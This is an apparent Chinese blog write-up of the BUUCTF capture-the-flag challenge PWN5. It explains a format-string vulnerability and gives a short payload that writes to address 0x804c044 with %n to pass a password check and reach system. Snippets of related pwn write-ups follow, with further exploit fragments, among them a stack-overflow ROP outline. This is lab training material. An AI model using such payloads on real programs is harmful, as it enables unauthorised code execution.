[BUUCTF]PWN10——[第五空间2019 决赛]PWN5

最新推荐文章于 2024-04-16 17:20:16 发布
最新推荐文章于 2024-04-16 17:20:16 发布
阅读量1.7k 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014377094/article/details/122698135
版权

这一道题利用的是格式化字符串漏洞

首先checksec一下,发现是开了canary的32位程序

放入ida

我们可以看到,这是让我们将自己输入的密码和随机密码进行比对,当比对成功就会自己执行system。

先输入AAAA%08x...找到相应的位置。传送门:(2条消息) 格式化字符串漏洞原理详解_ditto的博客-CSDN博客_格式化字符串漏洞

payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047)
payload+='%10$n%11$n%12$n%13$n'

其他操作与其他题无大差别

Marx_ICB
关注
190919 pwn-第五空间final_十生
whklhhhh的博客
09-19 2万+
说是题目,其实就是飞秋0day 233 之前虽然听说过各种windows的pwn 软件停止更新已久,保护都没开,是比较古老的玩意儿了 于是很容易搜到各种POC 例如0x49D03F处的整形溢出 v54是输入进来的字符串,因此可以提供4294967295=0xffffffff=-1从而使memcpy发生缓冲区溢出的异常,然后通过覆盖SEH的方式进行利用 通过cyclic生成字符串填入,可以测出溢...
ctfshow pwn10
qq_39980610的博客
08-22 476
pwn10
2021年“莲城杯”网络安全大赛-PWN-pwn10(三血)
qq_43264813的博客
10-12 898
2021年“莲城杯”网络安全大赛-PWN-pwn10 题目名称:pwn10 题目内容:栈溢出。靶机:nc 183.129.189.60 10016 题目分值:100.0 题目难度:容易 相关附件:pwn10的附件.zip 解题思路: 1.保护机制,静态链接,没pie 2.主要函数 3.做pwn要注意重点,输入一个长字符串,能把name冲掉,反正是个很大的数字,不用关注count是多少,反正够用。然后用不可寻址的地址找到偏移0x78,然后 rop syscall ```python #!/usr/bin/
CTFshow PWN 格式化字符串漏洞pwn10
Rt1Text的博客
03-27 651
checksec+运行 就是这个样子 确实还需要学习啊 KEEP LEARNING!!!!!! 32位 NX保护 ida进行中 if num == 16 即可cat flag 那么修改变量的值 明显的格式化字符串漏洞 确定参数位置 第7个 num跟进去 address=0x804A030 准备exp from pwn import* p=process('./pwn10') num_addr=0x804A030 payload=p32(num_add..
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4728
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4538
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
BUUCTF-Pwn-[第五空间2019 决赛]PWN5
餐桌上的猫
02-15 379
题目截图 检查文件信息 这是一个32位的程序,开启了NX和Canary 用IDA打开查看找到来能getshell的代码 反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell 测试我们输入的内容在栈中的位置,是第10个 exp from pwn import* r=remote('node4.buuoj.cn',28850) addr=
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 410
Buu CTF PWN第五空间2019 决赛]PWN5的WriteUp
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 454
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
BUUCTF的[第五空间2019 决赛]PWN5
frist_csdn的博客
02-26 159
使用IDA打开 可以看到明显的格式化字符串漏洞 ,它是在bss段0x804c044存储了一个随机数,然后通过最后比较输入的passwd和随机数是否一样,如果一样就打开/bin/sh命令。 我的思路是,通过格式化字符串漏洞泄露0x804c044的数据,然后把得到的数据作为有符号的整数的字符串输入给nptr,然后程序会用atoi把字符串转换为整型。 在pwndbg中对程序调试,发现输入的buf和esp差距为0x28,所以是第十个格式化参数。 from pwn import * p = r
CTFshow-PWN-前置基础(pwn10-pwn12)
Welcome To Myon'Blog !
04-16 472
寄存器相对寻址方式结束后eax寄存器的值为?在 ida 中找到对应汇编代码:双击跟进 dword_80490E8 ,得到这里 msg 的地址是:0x80490E8将该地址赋给寄存器 ecx接着使用 add 指令对 ecx 加 40x80490E8 对应十进制为 134516968因此 add 执行后,ecx 中值变为:134516972转为十六进制为:0x80490ec接下来是将 ecx 所指向的地址的值赋给 eaxecx 指向地址为 0x80490ec。
pwn10详细过程
weixin_42072280的博客
05-21 1620
题目均为linux 32系统静态链接编译程序,关闭栈执行保护 要求: 1.需在Linux系统下安装pwntools。 2、编写python脚本,基于pwntool在本地加载目标测试程序, 通过脚本给程序灌入输入数据,构造的输入数据需绕过程序各种校验条件,达到漏洞触发路径,最后构造能够利用漏洞的样本。 题目中说了是32位系统的程...
基于龙伯格(Luenberger)观测器的无感FOC电机矢量控制MATLAB Simulink仿真模型
10-06
基于龙伯格(Luenberger)观测器的无感FOC电机矢量控制MATLAB Simulink仿真模型 通过龙伯格观测器,我们可以在不直接测量转子角度的情况下,通过已知的电机电流、电压来估算转子角度。这种方法在控制理论和实际电机控制中具有广泛的应用,尤其是在无传感器的情况下。
web端实现《别踩白块》小游戏
10-06
通过JS实现web的《别踩白块》小游戏
python经典实例代码汇总+100例
最新发布
10-06
python经典实例代码汇总+100例
阵列天线泰勒综合法降低副瓣电平的matlab源代码
10-06
clear clc % 参数设置 Freq =30*(1e9); %频率 v_0=3*10^8;%光速 lamda = v_0/Freq ; % 波长 d = lamda * 0.6; % d为阵元间距 theta0 = (90/180)*pi; % 扫描角度 theta = 0: 0.01 : pi; % Θ为方向角 u = pi*d*(cos(theta)-cos(theta0))/lamda; %T = Chebyshev; % T为切比雪夫恒等式系数矩阵 N = 16; % N为直线阵的阵元数量,M为一侧的单元数(对称) R0dB = 20; % R0dB为副瓣电平 nbar=9; %相等电平副瓣数目 if (mod(N,2)==0) M = N / 2; parity = 0; % parity为奇偶性,0为偶数
Delphi 开发资源汇总及组件介绍
10-06
内容概要:本文档提供了一个归档快照,展示了一个精心策划的Delphi优秀框架、库与各种资源列表。其中包括大量通用库如JCL、JVCL、Spring4D以及Alcinoe等,针对多媒体(如音频视频)、网络通信工具集(如Indy、Synapse)以及界面控制包等多个模块的具体介绍。另外还涉及到脚本引擎(如DWScript)、内存管理、日志记录、加密解密技术等多项实用性组件及实用工具。此外它还有针对性地罗列了关于数据库连接库(例如ZeosLib、mORMot),单元测试库(像DUnitX,DUnit2等),以及各类IDE插件增强工具的细节描述。 适合人群:Delphi程序员及其开发者。 使用场景及目标:作为查找和选择适用于不同软件项目的Delphi第三方库、组件及其他辅助工具的参考书,为Delphi开发人员提高工作效率和扩展程序功能提供了有力的支持。 其他说明:该资料侧重于开源项目,且对已过时多年的旧工程保持较低的关注度。所有的进展和改进都会在其活跃维护的新版本Awesome-Pascal清单上进行。
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值